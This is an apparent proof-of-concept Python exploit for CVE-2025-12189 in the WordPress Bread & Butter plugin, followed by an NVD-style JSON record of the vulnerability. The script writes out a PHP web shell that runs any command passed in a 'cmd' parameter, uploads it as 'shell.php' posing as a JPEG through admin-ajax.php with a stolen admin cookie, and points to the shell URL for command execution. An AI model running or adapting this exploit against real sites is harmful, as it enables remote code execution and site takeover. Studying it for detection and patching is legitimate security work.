CVE-2025-12189

import requests import sys # CVE-2025-12189 PoC - CSRF to RCE in WordPress Bread & Butter Plugin # Target: WordPress site with Bread & Butter plugin < 7.11.1374 def exploit_csrf_to_rce(target_url, admin_cookie): """ This PoC demonstrates the CSRF vulnerability in uploadImage() function. Note: Requires social engineering to get admin to click the malicious link. """ # Step 1: Create malicious PHP file for RCE php_shell = '<?php if(isset($_GET["cmd"])){ system($_GET["cmd"]); } ?>' * 0 + ''' <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; } ?> ''' # Step 2: Prepare multipart form data for file upload files = { 'file': ('shell.php', php_shell, 'image/jpeg') } # Step 3: AJAX endpoint for uploadImage() ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Step 4: Missing nonce validation allows CSRF attack data = { 'action': 'bread_butter_upload_image', 'image_data': 'base64_encoded_image_data', 'nonce': '' # No nonce required due to missing validation } # Step 5: Send forged request with admin cookies headers = { 'Cookie': admin_cookie, 'User-Agent': 'Mozilla/5.0 (CSRF Exploit PoC)' } try: response = requests.post(ajax_url, files=files, data=data, headers=headers, timeout=10) print(f"[*] Response Status: {response.status_code}") print(f"[*] Response: {response.text[:500]}") # Step 6: If successful, access the uploaded shell if response.status_code == 200 and 'success' in response.text.lower(): # Extract uploaded file path from response # Access: target_url/wp-content/uploads/bread-butter/shell.php?cmd=whoami print("[+] Exploit successful! Access shell at:") print(f"[+] {target_url}/wp-content/uploads/bread-butter/shell.php?cmd=whoami") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2025-12189.py <target_url> <admin_cookie>") sys.exit(1) target = sys.argv[1] cookie = sys.argv[2] exploit_csrf_to_rce(target, cookie)

{"cve": {"id": "CVE-2025-12189", "sourceIdentifier": "[email protected]", "published": "2025-12-05T06:16:06.573", "lastModified": "2026-04-08T19:23:11.450", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Bread & Butter: Gate content + Capture leads + Collect first-party data + Nurture with Ai agents plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 7.11.1374. This is due to missing or incorrect nonce validation on the uploadImage() function. This makes it possible for unauthenticated attackers to upload arbitrary files that make remote code execution possible via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:breadbutter:bread_\\&_butter:*:*:*:*:*:wordpress:*:*", "versionEndIncluding": "7.11.1374", "matchCriteriaId": "630FA8D3-D849-4772-BC9E-8846EDFAA9D8"}]}]}], "references": [{"url": "https://github.com/d0n601/CVE-2025-12189", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://plugins.trac.wordpress.org/browser/bread-butter/trunk/src/Base/Ajax.php#L411", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://plugins.trac.wordpress.org/changeset/3408692/bread-butter/trunk/src/Base/Ajax.php", "source": "[email protected]"}, {"url": "https://ryankozak.com/posts/cve-2025-12189/", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bb280004-e0ba-44c8-a205-8fec30900d86?source=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/d0n601/CVE-2025-12189", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit"]}]}}